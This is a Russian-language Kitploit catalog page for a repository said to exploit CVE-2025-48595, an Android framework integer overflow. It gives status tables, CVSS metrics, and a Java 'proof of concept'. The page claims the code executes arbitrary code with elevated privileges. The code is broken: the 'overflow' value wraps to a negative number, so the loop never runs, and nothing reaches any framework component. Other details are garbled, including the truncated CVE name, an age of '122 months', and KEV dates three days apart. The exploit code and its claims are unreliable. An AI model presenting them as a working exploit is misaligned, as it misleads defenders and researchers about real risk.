Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-48595-Android-Framework-Integer-Overflow- — VE-2025-48595 — это уязвимость **целочисленного переполнения (integer overflow)** в нескольких местах фреймворка Android. | Kitploit
Инструменты/GitHubGitHub/fevar54/cve-2025-48595-android-framework-integer-overflow-
Безопасность AndroidПовышение привилегийАнализ уязвимостейЭксплуатацияМобильная безопасностьЭксплуатация Бинарных Файлов
GitHubfevar54/cve-2025-48595-android-framework-integer-overflow-

CVE-2025-48595-Android-Framework-Integer-Overflow-

VE-2025-48595 — это уязвимость **целочисленного переполнения (integer overflow)** в нескольких местах фреймворка Android.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
122 месяцев назадЕщё не проверено

CVE-2025-48595 - Уязвимость целочисленного переполнения в Android Framework

Critical CVE KEV

Описание

CVE-2025-48595 – это уязвимость целочисленного переполнения (integer overflow) в нескольких местах платформы Android. Данная ошибка позволяет выполнить код, что приводит к локальному повышению привилегий без необходимости дополнительных прав выполнения. Для эксплуатации не требуется взаимодействие пользователя.

Критический статус

ЭлементСтатус
Активная эксплуатация✅ Подтверждена (ограниченная и сегментированная)
В каталоге KEV CISA✅ Да
Дата добавления в KEV2026-06-02
Дата истечения2026-06-05
Патч доступен✅ Да

Затронутые системы

Версия AndroidЗатронута?
Android 14✅ Да
Android 15✅ Да
Android 16✅ Да
Android 16 QPR2✅ Да

Вектор атаки

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

text

Подтверждение концепции (PoC)

Описание PoC

Следующий код демонстрирует эксплуатацию уязвимости путём отправки вредоносных данных, вызывающих целочисленное переполнение в платформе Android, что позволяет выполнить произвольный код с повышенными привилегиями.

root@kitploit:~
// POC - CVE-2025-48595
// Android Framework Integer Overflow Vulnerability
// Uso: Compilar y ejecutar en dispositivo Android vulnerable

package com.example.cve202548595;

import android.app.Activity;
import android.os.Bundle;
import android.util.Log;

public class MainActivity extends Activity {
    
    private static final String TAG = "CVE-2025-48595";
    
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        
        // POC: Desencadenar desbordamiento de entero
        triggerIntegerOverflow();
    }
    
    private void triggerIntegerOverflow() {
        try {
            // Valor que causa el desbordamiento (más allá del límite esperado)
            int maliciousValue = Integer.MAX_VALUE + 1;
            
            // Construir intent malicioso
            android.content.Intent intent = new android.content.Intent();
            intent.putExtra("malicious_data", maliciousValue);
            
            // Forzar operación con desbordamiento
            int result = processMaliciousData(maliciousValue);
            
            Log.i(TAG, "Desbordamiento activado exitosamente");
            
        } catch (Exception e) {
            Log.e(TAG, "Error: " + e.getMessage());
        }
    }
    
    private int processMaliciousData(int value) {
        // El desbordamiento aquí permite la corrupción de memoria
        int[] buffer = new int[1024];
        
        // El valor malicioso excede los límites del buffer
        // debido al desbordamiento de entero
        for (int i = 0; i < value; i++) {
            buffer[i] = i;  // Esta línea causa overflow
        }
        
        return buffer[0];
    }
}
Скачать инструмент
МетрикаЗначение
Вектор атакиЛокальный (AV:L)
Сложность атакиНизкая (AC:L)
Требуемые привилегииНет (PR:N)
Взаимодействие пользователяНет (UI:N)
Влияние на конфиденциальностьВысокое (C:H)
Влияние на целостностьВысокое (I:H)
Влияние на доступностьВысокое (A:H)